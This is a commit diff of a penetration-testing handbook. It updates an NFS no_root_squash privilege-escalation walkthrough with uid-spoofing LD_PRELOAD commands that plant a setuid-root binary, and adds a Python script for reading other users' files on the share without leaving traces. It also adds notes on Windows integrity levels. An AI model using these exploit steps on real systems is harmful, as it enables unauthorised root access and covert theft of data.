GitBook: [master] 367 pages and 2 assets modified

linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md

@@ -46,7 +46,10 @@ cd <SHAREDD_FOLDER>
 ### Local Exploit
 
 {% hint style="info" %}
-Note that if you can create a tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports.
+Note that if you can create a **tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports**.  
+The following trick is in case the file `/etc/exports` **indicates an IP**. In this case you **won't be able to use** in any case the **remote exploit** and you will need to **abuse this trick**.  
+Another required requirement for the exploit to work is that **the export inside `/etc/export`** **must be using the `insecure` flag**.  
+--_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_--
 {% endhint %}
 
 **Trick copied from** [**https://www.errno.fr/nfs\_privesc.html**](https://www.errno.fr/nfs_privesc.html)\*\*\*\*
@@ -69,10 +72,13 @@ Here’s a [library that lets you do just that](https://github.com/sahlberg/libn
 
 #### Compiling the example <a id="compiling-the-example"></a>
 
-Depending on your kernel, you might need to adapt the example. In my case I had to comment out the fallocate syscall. Due to the absence of cmake on the system, I also needed to link against the precompiled library which can be [found here](https://sites.google.com/site/libnfstarballs/li).
+Depending on your kernel, you might need to adapt the example. In my case I had to comment out the fallocate syscalls.
 
 ```bash
-gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L../libnfs-1.11.0/lib/.libs/
+./bootstrap
+./configure
+make
+gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/
 ```
 
 #### Exploiting using the library <a id="exploiting-using-the-library"></a>
@@ -88,10 +94,10 @@ gcc pwn.c -o a.out
 Place our exploit on the share and make it suid root by faking our uid in the RPC calls:
 
 ```text
-LD_NFS_UID=0 LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/
-LD_NFS_UID=0 LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out
-LD_NFS_UID=0 LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out
-LD_NFS_UID=0 LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out
+LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/
+LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out
+LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out
+LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out
 ```
 
 All that’s left is to launch it:
@@ -103,3 +109,39 @@ All that’s left is to launch it:
 
 There we are, local root privilege escalation!
 
+### Bonus NFShell <a id="bonus-nfshell"></a>
+
+Once local root on the machine, I wanted to loot the NFS share for possible secrets that would let me pivot. But there were many users of the share all with their own uids that I couldn’t read despite being root because of the uid mismatch. I didn’t want to leave obvious traces such as a chown -R, so I rolled a little snippet to set my uid prior to running the desired shell command:
+
+```python
+#!/usr/bin/env python
+import sys
+import os
+
+def get_file_uid(filepath):
+    try:
+        uid = os.stat(filepath).st_uid
+    except OSError as e:
+        return get_file_uid(os.path.dirname(filepath))
+    return uid
+
+filepath = sys.argv[-1]
+uid = get_file_uid(filepath)
+os.setreuid(uid, uid)
+os.system(' '.join(sys.argv[1:]))
+```
+
+You can then run most commands as you normally would by prefixing them with the script:
+
+```text
+[root@machine .tmp]# ll ./mount/
+drwxr-x---  6 1008 1009 1024 Apr  5  2017 9.3_old
+[root@machine .tmp]# ls -la ./mount/9.3_old/
+ls: cannot open directory ./mount/9.3_old/: Permission denied
+[root@machine .tmp]# ./nfsh.py ls --color -l ./mount/9.3_old/
+drwxr-x---  2 1008 1009 1024 Apr  5  2017 bin
+drwxr-x---  4 1008 1009 1024 Apr  5  2017 conf
+drwx------ 15 1008 1009 1024 Apr  5  2017 data
+drwxr-x---  2 1008 1009 1024 Apr  5  2017 install
+```
+

windows/windows-local-privilege-escalation/README.md

@@ -6,6 +6,26 @@ If you want to **know** about my **latest modifications**/**additions**, **join
 If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.  
 Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
 
+## Process Integrity Levels
+
+From Windows Vista, all **protected objects are labeled with an integrity level**. Most user and system files and registry keys on the system have a default label of “medium” integrity. The primary exception is a set of specific folders and files writeable by Internet Explorer 7 at Low integrity. **Most processes** run by **standard users** are labeled with **medium integrity** \(even the ones started by a user inside the administrators group\), and most **services** are labeled with **System integrity**. The root directory is protected by a high-integrity label.  
+There are several levels of integrity:
+
+* **Untrusted** – processes that are logged on anonymously are automatically designated as Untrusted. _Example: Chrome_
+* **Low** – The Low integrity level is the level used by default for interaction with the Internet. As long as Internet Explorer is run in its default state, Protected Mode, all files and processes associated with it are assigned the Low integrity level. Some folders, such as the **Temporary Internet Folder**, are also assigned the **Low integrity** level by default. However,  note that a **low integrity process** is very **restricted**, it **cannot** write to the **registry** and it’s limited from writing to **most locations** in the current user’s profile.  _Example: Internet Explorer or Microsoft Edge_
+* **Medium** – Medium is the context that **most objects will run in**. Standard users receive the Medium integrity level, and any object not explicitly designated with a lower or higher integrity level is Medium by default. Not that a user inside the Administrators group by default will use medium integrity levels.
+* **High** – **Administrators** are granted the High integrity level. This ensures that Administrators are capable of interacting with and modifying objects assigned Medium or Low integrity levels, but can also act on other objects with a High integrity level, which standard users can not do. _Example: "Run as Administrator"_
+* **System** – As the name implies, the System integrity level is reserved for the system. The Windows kernel and core services are granted the System integrity level. Being even higher than the High integrity level of Administrators protects these core functions from being affected or compromised even by Administrators. Example: Services
+* **Installer** – The Installer integrity level is a special case and is the highest of all integrity levels. By virtue of being equal to or higher than all other WIC integrity levels, objects assigned the Installer integrity level are also able to uninstall all other objects.
+
+You can get the integrity level of a process using **Process Explorer** from **Sysinternals**, accessing the **properties** of the process and viewing the "**Security**" tab:
+
+![](../../.gitbook/assets/image%20%28349%29.png)
+
+You can also get your **current integrity level** using `whoami /groups`
+
+![](../../.gitbook/assets/image%20%28350%29.png)
+
 ## System Info
 
 ### Version info enumeration